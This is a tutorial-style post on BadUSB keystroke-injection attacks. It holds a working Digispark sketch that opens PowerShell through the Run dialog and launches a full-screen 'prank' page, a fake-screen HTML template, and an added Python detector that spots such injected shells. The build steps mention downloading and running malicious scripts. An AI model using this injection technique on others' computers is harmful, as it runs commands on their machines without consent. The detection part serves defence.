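This article is for learning and research purposes only; do not use it for illegal purposes. Unauthorized use of Bad USB may violate the law.
BadUSB
Bad USB is a computer security attack carried out through USB devices: by modifying a USB device's firmware, the device can be made to emulate human-interface devices such as a keyboard or mouse, and thereby execute malicious code once it is plugged into the target computer.
Bad USB attacks are hard for antivirus software to detect and defend against, because they act directly on the USB controller rather than on the USB storage space. The attack method was first demonstrated by security researchers at the Black Hat conference in 2014, and it attracted wide attention and discussion.
Steps for building a Bad USB device
Building a Bad USB device takes the following steps:
1. Prepare a programmable USB device, such as an Arduino development board or a TEENSY chip. This article uses the Digispark, an Attiny85 development board.
2. Using the Arduino IDE or another tool, write and upload code that emulates keyboard input, for example opening a command-line window, then downloading and running a malicious script.
3. Plug the USB device into the target computer and wait for the code to run automatically, completing the attack.
Bad USB attacks are very stealthy and dangerous, because they exploit the user's trust in USB devices to easily steal information, plant backdoors, spread viruses, and so on.
The code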
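Digispark.ino
```cpp
#include "DigiKeyboard.h"

void setup() {
  // Send an empty keystroke first so the host finishes recognising the keyboard
  DigiKeyboard.sendKeyStroke(0);
  // Win+D: show the desktop
  DigiKeyboard.sendKeyStroke(KEY_D, MOD_GUI_LEFT);
  DigiKeyboard.delay(100);
  // Win+R: open the Run dialog
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  DigiKeyboard.delay(500);
  // Type POWERSHELL and press Enter to start a PowerShell window
  DigiKeyboard.print("POWERSHELL");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(500);
  // Open the prank page; 你的恶搞网站 is the author's placeholder for its URL
  DigiKeyboard.print("Start-Process -FilePath 你的恶搞网站");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(2000);
  // F11: switch the browser to full screen
  DigiKeyboard.sendKeyStroke(KEY_F11);
}

void loop() {
  // Nothing to repeat: the keystrokes are sent once from setup()
}
```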
If you are interested, you can try it yourself.
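A host-side detection for the behaviour of the sketch above, as an added example that is not part of the original post: it flags a shell started by explorer.exe (the parent process of anything launched from the Run dialog) within a few seconds of a new keyboard enumerating. The event records, field names, device labels and the 10-second window are constructed assumptions, not a real Windows log schema.

```python
from datetime import datetime, timedelta

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Constructed sample telemetry from a hypothetical collector that has already
# normalised device arrivals and process starts into simple records.
SAMPLE_EVENTS = [
    {"ts": "2024-05-01T09:00:00", "kind": "keyboard_added", "device": "usb-kbd-A"},
    {"ts": "2024-05-01T09:00:02", "kind": "process_start",
     "image": "POWERSHELL.EXE", "parent": "explorer.exe"},   # matches the sketch
    {"ts": "2024-05-01T09:30:00", "kind": "keyboard_added", "device": "usb-kbd-B"},
    {"ts": "2024-05-01T09:30:04", "kind": "process_start",
     "image": "cmd.exe", "parent": "code.exe"},              # terminal opened by an editor
    {"ts": "2024-05-01T09:40:00", "kind": "process_start",
     "image": "powershell.exe", "parent": "explorer.exe"},   # ten minutes later: normal use
]


def find_injection_candidates(events, window_seconds=10):
    """Return (device, image, delay_seconds) for every shell that explorer.exe
    started within window_seconds after a new keyboard was attached."""
    window = timedelta(seconds=window_seconds)
    # Collectors often deliver events out of order, so sort by timestamp first.
    ordered = sorted(events, key=lambda e: datetime.fromisoformat(e["ts"]))
    last_keyboard = None  # (timestamp, device) of the most recent keyboard arrival
    hits = []
    for ev in ordered:
        ts = datetime.fromisoformat(ev["ts"])
        if ev["kind"] == "keyboard_added":
            last_keyboard = (ts, ev["device"])
        elif ev["kind"] == "process_start" and last_keyboard is not None:
            image = ev["image"].lower()
            parent = ev["parent"].lower()
            delay = ts - last_keyboard[0]
            if image in SHELLS and parent == "explorer.exe" and delay <= window:
                hits.append((last_keyboard[1], image, delay.total_seconds()))
    return hits


if __name__ == "__main__":
    for device, image, delay in find_injection_candidates(SAMPLE_EVENTS):
        print(f"ALERT: {image} started via explorer.exe {delay:.0f}s after {device} attached")
```

Treat a hit as a triage signal to combine with USB device allow-listing, not as proof of an attack.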
PS: here is an HTML template to use for the prank.
Digispark.html
```html
<!DOCTYPE html>
<html>
<head>
<style>
body {
  background: #000 no-repeat center center fixed;
  margin: 0;
  cursor: none;
}

.d1 {
  width: 550px;
  margin: 0px auto;
}

.d2 {
  position: absolute;
  top: 50%;
  width: 550px;
  margin-top: -5%;
}
</style>
</head>

<body>
<div class="d1">
  <div class="d2">
    <center>
      <img src="data:image/png;base64,...">
      <br><br><br>
      <img src="data:image/gif;base64,...">
    </center>
  </div>
</div>
</body>
</html>
```